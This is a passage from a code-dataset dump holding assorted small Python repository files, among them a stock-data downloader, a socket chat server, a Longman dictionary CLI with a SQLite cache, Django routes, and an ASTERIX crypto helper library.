csv\nimport os.path\n\ndef EditCsv(stock):\n\tdata = Share(stock)\n\tx = data.get_historical('2000-01-01','2016-04-01')\n\tdf = pd.DataFrame(x)\n\tcols = ['Date','Open','High','Low','Close','Volume','Adj_Close']\n\tdf = df.ix[:,cols]\n\tdf = df.set_index('Date')\n\tdf.to_csv(\"Stock/\"+stock+\".csv\")\ndef get_list(stock_list_file):\n\tstock_list = []\n\twith open(stock_list_file, 'rb') as csvfile:\n\t\tspamreader = csv.reader(csvfile, delimiter=',')\n\t\tfor row in spamreader:\n\t\t\tstock_list.append(row)\n\treturn stock_list[0]\n\nif __name__ == \"__main__\":\n\tstock_list = get_list('0.Stock_Ticker.csv')\n\tfor stock in stock_list:\n\t\tif not os.path.isfile(\"Stock/\"+stock+\".csv\"):\n\t\t\ttry:\n\t\t\t\tEditCsv(stock)\n\t\t\t\tprint (\"Finished\",stock)\n\t\t\texcept:\n\t\t\t\tprint (stock+\"cannot download\")\n","repo_name":"nancywu5/HKU-FinCloud","sub_path":"Collect Data: Preprocessing Data/US_Nasdaq/Get_Data.py","file_name":"Get_Data.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14408850603","text":"'''\n根据左右相等找,有点复杂\n'''\n\n\ndef get_mid(num):\n n = len(num)\n if n % 2 == 1:\n return num[int(n / 2)]\n else:\n end = int(n / 2)\n start = end - 1\n return sum(num[end], num[start]) / 2\n\n\ndef demo4(a, b):\n m, n = len(a), len(b)\n num = m + n\n if num % 2 == 0:\n p1 = int(num / 2) - 1\n p2 = p1 + 1\n left_num = p2\n\n else:\n p = int(num / 2)\n left_num = p\n\n b_start = 0\n a_x = 0\n a_y = m - 1\n\n b_x = 0 # 最左边下标\n b_y = n - 1 # 最右边下标\n drop_num = 0\n while left_num - drop_num > 0:\n a_y = len(a)\n b_y = len(b)\n a_mid = int((0 + a_y) / 2)\n b_mid = int((0 + b_y) / 2)\n\n if a[a_mid] >= b[b_mid]:\n drop_num += b_mid # 统计数量2/\n b = b[b_mid:]\n elif a[a_mid] < b[b_mid]:\n if a_mid == 0:\n del a[a_mid]\n drop_num += 1\n else:\n a = a[a_mid:]\n drop_num += a_mid # 5\n\n if len(a) == 0:\n p = left_num - drop_num\n return b[p]\n elif len(b) == 0:\n p = left_num - drop_num\n return a[p]\n\n return min(a[0], b[0])\n\n\n''' 寻找第k个小的数,转化为查找问题'''\ndef demo_version2(nums1, nums2):\n pass\n\n\nif __name__ == '__main__':\n a = [2, 4, 6, 9, 12, 17]\n b = [5, 7, 8, 10, 14]\n\n a = [1, 2, 5, 6]\n b = [3, 8, 9]\n res = demo4(a, b)\n print(res)\n","repo_name":"DaiJitao/algorithm","sub_path":"leetcode_china/demo4_4.py","file_name":"demo4_4.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12742946953","text":"import socket, threading\n\nPORT = 5050\nSERVER = socket.gethostbyname(socket.gethostname())\nADDR = (SERVER, PORT)\nFORMAT = 'utf-8'\nDISCONNECT_MESSAGE = \"DISCONNECT\"\nserver = socket.socket()\nserver.bind(ADDR)\nserver.listen()\n\nclients = []\nnicknames = []\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\ndef handle(client):\n while True:\n message = client.recv(1024)\n msg = message.decode(FORMAT)\n\n if msg != DISCONNECT_MESSAGE:\n broadcast(message)\n\n elif msg == DISCONNECT_MESSAGE:\n broadcast(f'{nickname} left the chat'.encode(FORMAT))\n index = clients.index(client)\n clients.remove(client)\n client.close()\n nickname = nicknames[index]\n nicknames.remove(nickname)\n break\n\n\ndef start():\n while True:\n client, address = server.accept()\n\n print(f\"Connected with {format(str(address))}\")\n client.send('NICKNAME'.encode(FORMAT))\n\n nickname = client.recv(1024).decode(FORMAT)\n nicknames.append(nickname)\n clients.append(client)\n\n print(f\"Nickname is {format(nickname)}\")\n \n broadcast(f\"{format(nickname)} joined\".encode(FORMAT))\n client.send('Connected to server!'.encode(FORMAT))\n\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\nstart()\n","repo_name":"Eudita/PP-mini-project-sem-II","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40227610573","text":"import nltk\nfrom pattern3.en import conjugate\nfrom pattern3.en import pluralize, singularize, lemma\nfrom pattern3.en import suggest\n\n\n# sent에서 position 위치에 있는 단어를 result로 대체해라.\nsent = \"He had given up the game.\"\nposition = 2\nresult = \"send\"\n\ntokens = nltk.word_tokenize(sent)\n# print(tokens)\ntagged = nltk.pos_tag(tokens)\nprint(tagged)\n\ntag = tagged[position][1]\nprint('POS tag : ' + tag)\n\n\nprint(suggest(tokens[position]))\nprint('Lemma : ' + lemma(tokens[position]))\n\n# 동사\nverb_set = {'VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ'}\ndic = dict()\ndic['VB'] = ['infinitive', None, None, None, None]\ndic['VBD'] = ['past', None, None, 'indicative', None]\ndic['VBG'] = ['present', None, None, 'indicative', 'progressive']\ndic['VBN'] = ['past', None, None, 'indicative', 'progressive']\ndic['VBP'] = ['present', 1, 'singular', 'indicative', 'imperfective']\ndic['VBZ'] = ['present', 3, 'singular', 'indicative', 'imperfective']\n\nif tag in verb_set:\n conjugated = conjugate(result,\n tense=dic[tag][0],\n person=dic[tag][1],\n number=dic[tag][2],\n mood=dic[tag][3],\n aspect=dic[tag][4],\n negated=False)\n result = conjugated if conjugated is not None else result\n\n# 명사\nnoun_set = {'NN', 'NNS', 'NNP', 'NNPS'}\n\nif tag in noun_set:\n if tag == 'NNS' or tag == 'NNPS':\n result = pluralize(result)\n else:\n result = singularize(result)\n\nprint('Result : ' + result)\n","repo_name":"jooh95/Phrase-Recognizing-System","sub_path":"grammar/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"14337315432","text":"'''\n@Author:Sailesh Chauhan\n@Date:2021-06-01\n@Last Modified by:Sailesh Chauhan\n@Last Modified time:2021-06-01\n@Title:To Welcome User\n'''\n\nimport sys\ntry:\n userName=str(input(\"Enter your Full Name\\n\"))\n userName=userName.replace(\" \",\"\")\n if(len(userName)>3):\n print(\"Hello \"+userName+\" ,How are you ?\")\n quit()\n print(\"User Name must be more than 3 characters\") \nexcept Exception as ex:\n print(ex)","repo_name":"saileshchauhan/PythonProgram","sub_path":"BasicCorePrograms/1_WelcomeUser.py","file_name":"1_WelcomeUser.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22396862185","text":"#!/usr/bin/env python3\n\nimport sys\nimport re\nimport json\nimport os\nimport sqlite3\nimport socket\n\nfrom itertools import count\nfrom functools import cmp_to_key\nfrom argparse import ArgumentParser\nfrom configparser import ConfigParser\nfrom pathlib import Path\nfrom contextlib import closing\nfrom urllib.error import URLError\nfrom urllib.request import urlopen\nfrom urllib.parse import quote\n\nfrom lxml import etree\n\n_VERSION = '2.0.4'\n\nMAIN_URL = 'https://www.ldoceonline.com/dictionary/{0}'\n\n\nclass OptionAndConfig:\n \"\"\"Save options from command line\n and the configs from config file if specify\n \"\"\"\n quiet = False\n dbpath = '$HOME/.cache/ldcv/ldcv-cache.db3'\n threads_max = 20\n timeout = 7\n\n _HOME = os.getenv('HOME')\n _THREAD_MAX = 100\n _TIMEOUT = 10*60 # 10 minutes\n\n def __init__(self):\n self.dbpath = self.dbpath.replace('$HOME', self._HOME)\n\n\noptions = OptionAndConfig()\n\ndef strip(s):\n \"\"\"Remove redundant space characters\n \"\"\"\n return re.sub(r\"[\\s]+\", ' ', s).strip() if isinstance(s, str) else ''\n\n\ndef parse_word_fams(wordfams):\n if wordfams is None:\n return []\n return list(set(word for word in wordfams.xpath(\".//@title\")))\n\n\ndef parse_sense(sense, freq=1):\n def _(exp):\n EMPTY_ELEMENT = etree.Element('_')\n eles = sense.find(exp)\n return eles if eles is not None else EMPTY_ELEMENT\n\n def parse_examples():\n def mp3(ent):\n src = ent.find('.//span[@data-src-mp3]')\n return src.attrib['data-src-mp3'] if src is not None else ''\n return list({\n 'coll': ['', ''],\n 'example': [strip(''.join(example.itertext())), mp3(example)],\n } for example in sense.iterfind('.//span[@class=\"EXAMPLE\"]'))\n\n ret = {\n # the smaller the more frequent, ordered by original page\n 'freq': freq,\n # the opposite\n 'opp': strip(''.join(x for x in _('.//span[@class=\"OPP\"]').itertext()\n if x not in ('OPP', 'SYN'))),\n # the synonym\n 'syn': strip(''.join(x for x in _('.//span[@class=\"SYN\"]').itertext()\n if x not in ('OPP', 'SYN'))),\n # a short explanation\n 'signpost': strip(_('.//span[@class=\"SIGNPOST\"]').text),\n # countable or uncountable\n 'attr': ''.join(filter(lambda x: x.strip() not in ('[', ']'),\n _('.//span[@class=\"GRAM\"]').itertext())),\n # the exact explanation\n 'def': ''.join(_('.//span[@class=\"DEF\"]').itertext()).strip(),\n # example sentences\n 'examples': parse_examples(),\n # phrases maybe?\n 'refs': list(x.strip() for x in re.split(r'[^ ()=/\\'’\\w-]+',\n ''.join(_('.//span[@class=\"Crossref\"]').itertext())) \\\n if x.strip() != ''),\n }\n return ret\n\n\ndef parse_entry(entry):\n def _(exp):\n EMPTY_ELEMENT = etree.Element('_')\n ret = entry.find(exp)\n return ret if ret is not None else EMPTY_ELEMENT\n\n def mp3(exp):\n src = entry.xpath(exp)\n return src[0].attrib['data-src-mp3'] if src else ''\n\n ret = {\n 'pron': ''.join(_('.//span[@class=\"PronCodes\"]').itertext()).strip(),\n 'attr': strip(_('.//span[@class=\"POS\"]').text),\n 'audio-br': mp3('.//span[contains(@class, \"brefile\")]'),\n 'audio-us': mp3('.//span[contains(@class, \"amefile\")]'),\n 'senses': [parse_sense(sense, i) for i, sense in enumerate(entry.iterfind('.//span[@class=\"Sense\"]'), 1)]\n }\n return ret\n\n\ndef page_didyoumean(html, word):\n didyoumean = html.find('.//ul[@class=\"didyoumean\"]')\n if didyoumean is None:\n return None\n return {\n 'word': word,\n 'suggestions': [x.text.strip() for x in didyoumean.iterfind('.//li/a')],\n }\n\n\ndef parse_word(html):\n \"\"\"@html: etree.Element\n \"\"\"\n word = {\n 'word': html.find('.//h1[@class=\"pagetitle\"]').text,\n 'fams': parse_word_fams(html.find('.//div[@class=\"wordfams\"]')),\n 'entries': [parse_entry(entry) for entry in html.xpath('//span[@class=\"dictentry\"]')],\n }\n\n return word\n\n\nclass Colorizing:\n colors = {\n 'none': \"\",\n 'default': \"\\033[0m\",\n 'bold': \"\\033[1m\",\n 'underline': \"\\033[4m\",\n 'blink': \"\\033[5m\",\n 'reverse': \"\\033[7m\",\n 'concealed': \"\\033[8m\",\n\n 'black': \"\\033[30m\",\n 'red': \"\\033[31m\",\n 'green': \"\\033[32m\",\n 'yellow': \"\\033[33m\",\n 'blue': \"\\033[34m\",\n 'magenta': \"\\033[35m\",\n 'cyan': \"\\033[36m\",\n 'white': \"\\033[37m\",\n\n 'on_black': \"\\033[40m\",\n 'on_red': \"\\033[41m\",\n 'on_green': \"\\033[42m\",\n 'on_yellow': \"\\033[43m\",\n 'on_blue': \"\\033[44m\",\n 'on_magenta': \"\\033[45m\",\n 'on_cyan': \"\\033[46m\",\n 'on_white': \"\\033[47m\",\n\n # ~color: the background color is `color'\n # and text color is reversal `color'\n '~black': \"\\033[40m\\033[37m\",\n '~red': \"\\033[41m\\033[36m\",\n '~green': \"\\033[42m\\033[35m\",\n '~yellow': \"\\033[43m\\033[34m\",\n '~blue': \"\\033[44m\\033[33m\",\n '~magenta':\"\\033[45m\\033[32m\",\n '~cyan': \"\\033[46m\\033[31m\",\n '~white': \"\\033[47m\\033[30m\",\n\n 'beep': \"\\007\",\n }\n\n @classmethod\n def colorize(cls, s, color=None):\n if options.color == 'never':\n return s\n if options.color == 'auto' and not sys.stdout.isatty():\n return s\n if color is None:\n return s\n colors = ''.join(cls.colors[x] for x in color.split(',') if x in cls.colors)\n return \"{0}{1}{2}\".format(colors, s, cls.colors['default'])\n\n\nclass OrderedNumber:\n list_chars = {\n 'number': ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9',],\n 'superscript': ['⁰', '¹', '²', '³', '⁴', '⁵', '⁶', '⁷', '⁸', '⁹',],\n }\n\n def __init__(self, _type='number'):\n self.chars = self.list_chars[_type] if _type in self.list_chars else self.list_chars['number']\n\n def __getitem__(self, no):\n return ''.join([self.chars[int(x)] for x in str(no)])\n\nclass DbAdapter:\n def __init__(self, dbpath):\n # TODO support Windows\n # mkdir recursively the dbpath directory\n directory = os.path.dirname(dbpath)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n self._db = sqlite3.connect(dbpath)\n with closing(self._db.cursor()) as cur:\n cur.execute(\"\"\"create table if not exists `words`(\n `word` text not null unique,\n `explanation` blob not null,\n primary key(`word`))\"\"\")\n self._db.commit()\n\n def __getitem__(self, word):\n if not isinstance(word, str):\n return None\n\n with closing(self._db.cursor()) as cur:\n cur.execute(\"select `explanation` from `words` where `word` = ?\", (word,))\n exp = cur.fetchone()\n try:\n exp = json.loads(exp[0] if exp else None)\n except TypeError or json.decoder.JSONDecodeError:\n return None\n return exp\n\n def __setitem__(self, word, explanation):\n with closing(self._db.cursor()) as cur:\n cur.execute(\"insert into `words`(`word`,`explanation`) values(?, ?)\",\n (word, json.dumps(explanation, ensure_ascii=False)))\n self._db.commit()\n\n def get_all_cached_words(self):\n with closing(self._db.cursor()) as cur:\n cur.execute(\"select `word` from `words`\")\n words = cur.fetchall()\n return (word[0] for word in words)\n\n def close(self):\n self._db.close()\n\n\ndef arg_parse():\n parser = ArgumentParser(prog='ldcv', description=\"LongMan Console Version\")\n parser.add_argument('-f', '--full',\n action='store_true',\n default=False,\n help=\"print verbose explanations. \"\n \"Default to print first three explanations\")\n parser.add_argument('-j', '--json',\n action='store_true',\n default=False,\n help=\"dump the explanation with JSON style\")\n parser.add_argument('--cache',\n action='store',\n help=\"specify a word list file then cache words from it to <cachefile>\")\n parser.add_argument('--merge',\n action='store',\n help=\"specify other <cachefiles> so merge the word and explanation to this <cachefile>\")\n parser.add_argument('-c', '--config',\n action='store',\n help=\"specify a config file\")\n parser.add_argument('--color',\n choices=['always', 'auto', 'never'],\n default='auto',\n help=\"colorize the output. \"\n 'Default to \"auto\" or can be \"never\" or \"always\"')\n parser.add_argument('words',\n nargs='*',\n help=\"words or quoted phrases to lookup\")\n return parser.parse_args(namespace=options)\n\n\ndef format_out_explanation(exp):\n \"\"\"format explanation from dict and print it\n \"\"\"\n # use in the inner for cache words\n if options.quiet:\n return\n\n if options.json:\n print(json.dumps(exp, ensure_ascii=False,indent=2, separators=(',', ': ')))\n return\n\n _ = Colorizing.colorize\n SENSE_MAX = 7\n SENSE_MIN = 3\n EXAMPLE_MAX = 3\n\n print(_(exp['word'], 'bold'))\n fams = exp['fams']\n if fams:\n print(\"{0}: {1}\".format(_(\"Word Families\", 'yellow'), \", \".join(fams)))\n\n def sense_cmp(a, b):\n # the prior field is `signpost' then `freq'\n if a['signpost'] != '':\n if b['signpost'] != '':\n return (a['freq'] - b['freq'])\n else:\n return -1\n elif b['signpost'] != '':\n return 1\n else:\n return (a['freq'] - b['freq'])\n\n SUPER = OrderedNumber('superscript')\n for i, entry in enumerate(exp['entries'], 1):\n attr = ''\n if entry['attr'] != '':\n attr = \" {} \".format(_(entry['attr'], 'green'))\n pron = entry['pron'] if entry['pron'] != '//' else ''\n print(\"{0}{1}{2}{3}\".format(exp['word'], SUPER[i], attr, pron))\n for i, sense in enumerate(sorted(entry['senses'],\n key=cmp_to_key(sense_cmp)), 1):\n if options.full or (sense['def'] != '' and i < SENSE_MAX) \\\n or (sense['def'] == '' and i < SENSE_MIN):\n print(\" {}.\".format(i), end='')\n if sense['attr'] != '':\n print(\" [{}]\".format(_(sense['attr'], 'green')), end='')\n if sense['signpost'] != '':\n print(\" {} \".format(_(sense['signpost'].upper(), 'yellow')), end='')\n print(\" {}\".format(_(sense['def'], 'cyan')), end='')\n if sense['syn'] != '':\n print(' {}: {}'.format(_('SYN', 'yellow'), sense['syn']), end='')\n if sense['opp'] != '':\n print(' {}: {}'.format(_('OPP', 'yellow'), sense['opp']), end='')\n print('')\n for i, example in enumerate(sense['examples'], 1):\n if options.full or i < EXAMPLE_MAX:\n print(\" ➤ {1}\".format(i, example['example'][0]))\n else:\n break\n if sense['refs']:\n print(\" » {0}\".format(\", \".join(sense['refs'])))\n else:\n break\n print('')\n\n\ndef format_out_suggestion(sugg):\n # use in the inner for cache words\n if options.quiet:\n return\n _ = Colorizing.colorize\n print('{0} {1}'.format(_(sugg['word'], 'bold'), _('not found', 'red')))\n print('{0} {1}'.format(_('Did you mean:', 'green'), ', '.join(sugg['suggestions'])))\n\n\ndef page_no_results(html):\n h1 = html.find('.//h1[@class=\"search_title\"]')\n if h1 is None:\n return False\n title = ''.join(h1.itertext()).lower()\n return (\"sorry\" in title and \"no\" in title)\n\n\ndef format_out_sorry_page(word):\n # use in the inner for cache words\n if options.quiet:\n return\n _ = Colorizing.colorize\n print('{0} {1}'.format(_(\"Sorry, there are no results for\", 'red'), _(word, 'bold')))\n\n\ndef lookup_word(word):\n if os.path.exists(options.dbpath) \\\n and not os.path.isfile(options.dbpath):\n print(\"dbcache file has existed at {} \"\n \"and isn't a regular file.\".format(options.dbpath))\n return 1\n # prepare this word, maybe this is a feasible idea\n word = strip(word.lower()).replace(' ', '-')\n db = DbAdapter(options.dbpath)\n exp = db[word]\n if exp:\n format_out_explanation(exp)\n db.close()\n return 0\n\n try:\n data = urlopen(MAIN_URL.format(quote(word)), timeout=options.timeout)\n except socket.timeout:\n print(\"Network timed out in {}s\".format(options.timeout))\n db.close()\n return 1\n except OSError:\n print(\"Network is unavailable\")\n db.close()\n return 1\n ctx = data.read().decode(\"utf-8\")\n html = etree.HTML(ctx)\n\n suggestion = page_didyoumean(html, word)\n # the page `sorry' means that the word is random letters\n if page_no_results(html):\n format_out_sorry_page(word)\n # the page `didyoumean' means that the word you type doesn't exist\n elif suggestion is not None:\n format_out_suggestion(suggestion)\n else:\n exp = parse_word(html)\n # cache this word\n db[word] = exp\n format_out_explanation(exp)\n db.close()\n return 0\n\ndef interaction():\n \"\"\"interactional mode\n \"\"\"\n print('LongMan Console Version. type /help to get help.')\n try:\n import readline\n except ImportError:\n pass\n while True:\n try:\n word = input('> ').strip()\n if word.startswith('/'):\n if word in ('/full'):\n options.full = True\n print('verbose explanations on')\n elif word in ('/!full', '/~full'):\n options.full = False\n print('verbose explanations off')\n elif word in ('/v', '/version'):\n print('v{}'.format(_VERSION))\n elif word in ('/h', '/help'):\n print('/full turn on verbose explanation\\n'\n '/!full, /~full turn off verbose explanation\\n'\n '/h, /help show this page\\n'\n '/v, /version show version\\n'\n '/q, /quit exit programm')\n elif word in ('/q', '/quit'):\n break\n elif word != '':\n lookup_word(word)\n except KeyboardInterrupt:\n print()\n continue\n except EOFError:\n break\n print(\"Bye\")\n\n\ndef cache_words(wordsfile):\n from time import time\n from multiprocessing import Process\n\n threads_max = options.threads_max\n\n words = []\n with open(wordsfile) as cf:\n words = [strip(word) for line in cf for word in re.split('[,;|\\n]+', line) if strip(word) != '']\n\n print(\"caching {} words with {} threads.\".format(len(words), threads_max))\n options.quiet = True\n start = time()\n def thread_lookup_word(words):\n for w in words:\n lookup_word(w)\n portion_size = max(1, len(words) // threads_max)\n tasks = []\n for i in range(0, len(words), portion_size):\n ws = words[i:i+portion_size]\n if not ws:\n continue\n thread = Process(target=thread_lookup_word,\n name=\"quering words({}~{})\".format(i, i+portion_size), args=(ws,))\n thread.start()\n tasks.append(thread)\n for t in tasks:\n t.join()\n end = time()\n elapse = end-start\n print(\"cache {} word(s) and the total time \"\n \"is {:.2f}s, average time {:0.2f}/s with {} threads.\".format(\n len(words), elapse, len(words)/elapse, threads_max))\n\ndef merge_db(otherdb):\n count = 0\n todb = DbAdapter(options.dbpath)\n fromdb = DbAdapter(otherdb)\n print(f\"merge {otherdb} into dbcache locating at {options.dbpath} ...\")\n for word in fromdb.get_all_cached_words():\n if not todb[word]:\n print(f\"merge {word} into dbcache\")\n todb[word] = fromdb[word]\n count += 1\n fromdb.close()\n todb.close()\n print(f\"merge {otherdb} into dbcache over with amount of {count}\")\n\n\ndef parse_config(config):\n \"\"\"parse config file according to the order `/etc/ldcv/ldcvrc',\n `$HOME/.config/ldcv/ldcvrc', `./ldcvrc' and @config, and the later\n will overwrite the prevoius\n \"\"\"\n global options\n RCLIST = ('/etc/ldcv/ldcvrc', options._HOME+'/.config/ldcv/ldcvrc',\n './ldcvrc', config or '')\n cfg = ConfigParser()\n for rc in RCLIST:\n if not os.path.isfile(rc):\n continue\n cfg.read(rc)\n # parse `main' section\n if 'main' in cfg and 'full' in cfg['main']:\n options.full = cfg['main'].getboolean('full')\n # parse `cache` section\n if 'cache' in cfg:\n cache = cfg['cache']\n if 'dbpath' in cache:\n path = cache['dbpath'].replace('$HOME', options._HOME)\n cwd = os.getcwd()\n # absolute path, evaluate directly\n if os.path.isabs(path):\n options.dbpath = path\n # relative path, add prefix the current word directory\n else:\n options.dbpath = os.path.join(cwd, path)\n if 'threads-max' in cache:\n # 2 ~ options._THREAD_MAX\n tmax = max(2, int(cache['threads-max']))\n options.threads_max = min(tmax, options._THREAD_MAX)\n # parse `net` section\n if 'net' in cfg:\n net = cfg['net']\n if 'timeout' in net:\n tout = max(3, int(net['timeout']))\n options.timeout = min(tout, options._TIMEOUT)\n\n\ndef main():\n global options\n options = arg_parse()\n\n parse_config(options.config)\n\n if options.cache:\n cache_words(options.cache)\n elif options.merge:\n merge_db(options.merge)\n elif options.words:\n for word in options.words:\n lookup_word(word)\n else:\n interaction()\n\nif __name__ == '__main__':\n main()\n","repo_name":"leetking/ldcv","sub_path":"src/ldcv.py","file_name":"ldcv.py","file_ext":"py","file_size_in_byte":18714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"25297567097","text":"from django.urls import path\r\n\r\nfrom . import views\r\n\r\napp_name = 'dashboard'\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('accounts/', views.accounts, name='accounts'),\r\n path('accounts/new/', views.AddAccount.as_view(), name='add_account'),\r\n path('accounts/delete/<int:id>', views.DeleteAccount.as_view(), name='delete_account'),\r\n path('accounts/run/<int:id>', views.RunAccount.as_view(), name='run_account'),\r\n path('accounts/stop/<int:id>', views.StopAccount.as_view(), name='stop_account'),\r\n path('profile/', views.profile, name='profile')\r\n]\r\n","repo_name":"Downsidelama/INSTAFOLLOWO","sub_path":"dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"73513875848","text":"import pandas as pd\ncsv_list=['bakery.csv','home_goods_store.csv','supermarket.csv',\n'bank.csv','convenience_store.csv','liquor_store.csv',\n'bar.csv','department_store.csv','restaurant.csv',\n'cafe.csv','drugstore.csv', 'store.csv'\n]\nfor i in range(12):\n df = pd.read_csv(csv_list[i])\n df.drop(inplace = True,columns=\"Unnamed: 0\")\n df.drop_duplicates(inplace = True, ignore_index=True)\n df.to_csv(\"../no_dup/\" + csv_list[i])","repo_name":"Zachary-R-Wilson/Food-Deserts-and-Topeka","sub_path":"Extras/google_maps_data/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"11506582794","text":"def make_jsonifiable(model, data=[]):\n if data is None:\n return None\n\n keys = [column.key for column in model.__table__.columns if column.key is not 'password']\n json_data = []\n try:\n for row in data:\n json_row = {}\n for key in keys:\n if key is not 'password':\n json_row.update({key : getattr(row,key)})\n\n json_data.append(json_row)\n return json_data\n except TypeError:\n #not iterable\n json_row = {}\n for key in keys:\n json_row.update({key: getattr(data, key)})\n json_data.append(json_row)\n return json_data\n\n return [{\n 'error': 'Something went wrong parsing data model'\n }]\n\ndef update_model(table, row, request):\n keys = [column.key for column in table.__table__.columns]\n\n for key in keys:\n try:\n setattr(row, key, request.json[key])\n except KeyError:\n print('key error')\n\n return row\n\ndef format_features(FeatureRequest, features):\n formatted_features = []\n\n for feature in features:\n\n feature.target_date = str(feature.target_date)\n formatted_feature = make_jsonifiable(FeatureRequest, feature)\n\n user = feature.user_features\n if user is not None:\n formatted_feature[0]['user_name'] = feature.user_features.fullname\n else:\n formatted_feature[0]['user_name'] = 'N/A'\n\n client = feature.client_features\n if client is not None:\n formatted_feature[0]['client_name'] = feature.client_features.name\n else:\n formatted_feature[0]['client_name'] = 'N/A'\n\n product = feature.product_features\n if product is not None:\n formatted_feature[0]['product_name'] = feature.product_features.name\n else:\n formatted_feature[0]['product_name'] = 'N/A'\n\n formatted_features.append(formatted_feature[0])\n\n return formatted_features\n","repo_name":"Quixotical/Intuitive","sub_path":"src/backend/model_helpers.py","file_name":"model_helpers.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"346178795","text":"\"\"\"\nASTERIX Cat0 Security Layer\nLibrary\n\nA library used by all modules\n\"\"\"\n\nfrom nacl import signing, public\nfrom cryptography.fernet import Fernet\nfrom cryptography.hazmat.primitives import hashes, hmac\nimport os\nimport logging\n\ndef load_IEK_from_file(filepath: str) -> bytes:\n \"\"\"\n Loads the Initiation Encryption Key from a file.\n \"\"\"\n iek = None\n with open(filepath, 'rb') as file:\n iek = file.read()\n return iek\n\ndef fernet_generate_iek(filepath: str) -> None:\n \"\"\"\n Generates a random Initiation Encryption Key and saves it to a file\n \"\"\"\n with open(filepath, 'wb') as file:\n file.write(Fernet.generate_key())\n\ndef fernet_iek_cipher(iek: bytes, plaintext: bytes) -> bytes:\n \"\"\"\n Ciphers the plaintext using the provided IEK (using the Fernet Cipher)\n Returns the ciphertext\n \"\"\"\n f = Fernet(iek)\n return f.encrypt(plaintext)\n\ndef fernet_iek_decipher(iek: bytes, ciphertext: bytes) -> bytes|None:\n \"\"\"\n Deciphers the ciphertext using the provided IEK.\n Returns the plaintext if all provided arguments are correct, otherwise returns None\n \"\"\"\n f = Fernet(iek)\n try:\n return f.decrypt(ciphertext)\n except Exception as e:\n logging.error(e)\n return None\n\ndef eddsa_generate() -> tuple[signing.SigningKey, signing.VerifyKey]:\n \"\"\"\n Generates a random ED25519 keypair.\n Returns the generated private and public key.\n \"\"\"\n signkey = signing.SigningKey.generate()\n return (signkey, signkey.verify_key)\n\ndef eddsa_sign(signkey: signing.SigningKey, content: bytes) -> bytes:\n \"\"\"\n Signs the content using the ED25519 signing algorithm and the provided signing key.\n Returns the resulting signature.\n \"\"\"\n return signkey.sign(content).signature\n\ndef eddsa_verify(verifykey: signing.VerifyKey, signature: bytes, plaintext: bytes) -> bool:\n \"\"\"\n Verifies the ED25519 signature associated with a plaintext using a verifying key.\n Returns True if the verification was successful.\n \"\"\"\n try:\n verifykey.verify(plaintext, signature)\n return True\n except Exception as e:\n logging.error(e)\n return False\n\ndef curve_encr(verifykey: signing.VerifyKey, content: bytes) -> bytes:\n \"\"\"\n Encrypts the content with the content's recipient's public key\n Returns the ciphertext\n \"\"\"\n publkey = verifykey.to_curve25519_public_key()\n box = public.SealedBox(publkey)\n return box.encrypt(content)\n\ndef curve_decr(signkey: signing.SigningKey, ciphertext: bytes) -> bytes|None:\n \"\"\"\n Decrypts the ciphertext with the agent's own private key\n Returns the plaintext or None if the process failed\n \"\"\"\n privkey = signkey.to_curve25519_private_key()\n box = public.SealedBox(privkey)\n try:\n return box.decrypt(ciphertext)\n except Exception as e:\n logging.error(e)\n return None\n\ndef hmac_generate() -> bytes:\n \"\"\"\n Generates a random 20-bytes secret.\n Returns the generated secret.\n \"\"\"\n return os.urandom(20)\n\ndef hmac_sign(key: bytes, content: bytes) -> bytes:\n \"\"\"\n Signs the SHA-1 hash of the content using the provided key.\n Returns the signature.\n \"\"\"\n h = hmac.HMAC(key, hashes.SHA1())\n h.update(content)\n return h.finalize()\n\ndef hmac_verify(key, message, signature) -> bool:\n \"\"\"\n Verifies the authenticity and integrity of the message and its signature using the provided key.\n Returns True if the verification was successful.\n \"\"\"\n h = hmac.HMAC(key, hashes.SHA1())\n h.update(message)\n try:\n h.verify(signature)\n return True\n except Exception as e:\n logging.error(e)\n return False\n\n# Launching the lib file as a standalone allows the easy creation of a new IEK\nif __name__ == \"__main__\":\n fernet_generate_iek(input(\"Enter the filepath to save the new IEK: \"))\n","repo_name":"KirrimK/ASTERIX_cat0_sec_layer","sub_path":"src/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1821361531","text":"from .base import Scannable, DEBUG_LEVEL, OUTPUT_FORMAT\nimport os, json\nclass Apache(Scannable):\n def __init__(self):\n Scannable.__init__(self, \"Apache\", \"Apache web server\")\n self._log_paths = [\"/var/log/apache2/access.log\"]\n self.__threats = None\n\n def canRun(self):\n return Scannable.canRun(self)\n\n def scan(self):\n Scannable.scan(self)\n\n def scanFile(self, logfile):\n if not os.path.exists(logfile):\n return\n if self._debug_level == DEBUG_LEVEL.INFO:\n print(\"Scanning Apache log file: \" + logfile)\n threats = {\n 'fatal_error': [],\n 'not_found': 